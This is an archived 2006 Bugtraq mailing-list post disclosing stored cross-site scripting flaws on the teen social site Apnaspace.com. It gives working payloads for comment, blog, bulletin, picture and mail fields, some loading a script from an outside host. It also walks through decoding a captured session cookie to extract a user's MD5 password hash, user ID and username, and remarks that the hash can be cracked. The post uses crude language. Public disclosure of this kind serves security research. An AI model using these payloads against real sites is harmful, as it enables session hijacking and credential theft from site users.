lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060612232828.6221.qmail@securityfocus.com>
Date: 12 Jun 2006 23:28:28 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Apnaspace.com - XSS with cookie disclosure


Apnaspace.com (A myspace type site for arab & indian teens)

Homepage:
http://www.http://www.apnaspace.com

Effected files:

* Comment input box:

* Posting a blog entry:
- Entry title
- Entry body

* Viewing a profile

* Posting a bulletin.

* Commenting on a picture

* Sending mail to someone
------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

Since there a vulnerability in bbcode 1.23.1 and below, we can execute our XSS example and display the cookie info by putting the following in as a comment:

[img]javascript:alert(document.cookie)[/img]

This also works when creating a new blog entry too. Just put the above codeinasyour"entry title" or "entry subject"

Screenshots:
http://www.youfucktard.com/xsp/apna1.jpg
http://www.youfucktard.com/xsp/apna2.jpg

Our Cookie:

TIME=1150153432; switchmenu; apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D; apnaforum_sid=2964cbd2c5a3f3d1a911fbf777c32300; NATIO=luny666;__utma=265362911.794893539.1150148238.1150148238.1150151884.2; __utmc=265362911; __utmz=265362911.1150148238.1.1.utmccn=(referral|utmcsr=dmoz.org|utmcct=/Recreation/Picture_Ratings/|utmcmd=referral; __utmb=265362911


The cookie looks pretty much the same as a few of the others I've discussed. I'll just post whats needed:

Dcoding the Hex value of:

apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;

We get:

a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:4:"3462";}

What we need:

91da4589b012c2fe1ceac1fb2363dbc6 (Our md5 hashed password, which is fuckit)

Our userid is:3462

Now lets godown to NATIO=luny666 (This is our username)

Congrats, you now know the md5 hashed pw, which can be cracked, as well as our username from this cookie. Lets move on to other parts of the site that suffer from XSS vulns.

---------------------------------------------

Posting a bulletin XSS vuln:

When postinga bulletin, userinput is not sanatized and filtered before being generated. So, unlike above, where we had to use the sites standard bbcode tags,  we can just use normal html tags here. For PoC when submitting a bulletin, try putting <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> in as your bulletin subject.

Screenshots:
http://www.youfucktard.com/xsp/apna3.jpg
http://www.youfucktard.com/xsp/apna4.jpg
http://www.youfucktard.com/xsp/apna5.jpg

----------------------------------------------

Commenting on a picture:

Same ast he first XSS vuln, we use bbcode here. ForPoC try putting the following in as your comment when rating a picture:

[img]javascript:alert(document.cookie)[/img]

Screenshots:
http://www.youfucktard.com/xsp/apna6.jpg
http://www.youfucktard.com/xsp/apna7.jpg

-------------------------------------------------

Sending someone mail:

No filtering is needed here,for PoC as your mail title or subject just put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

---------------------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ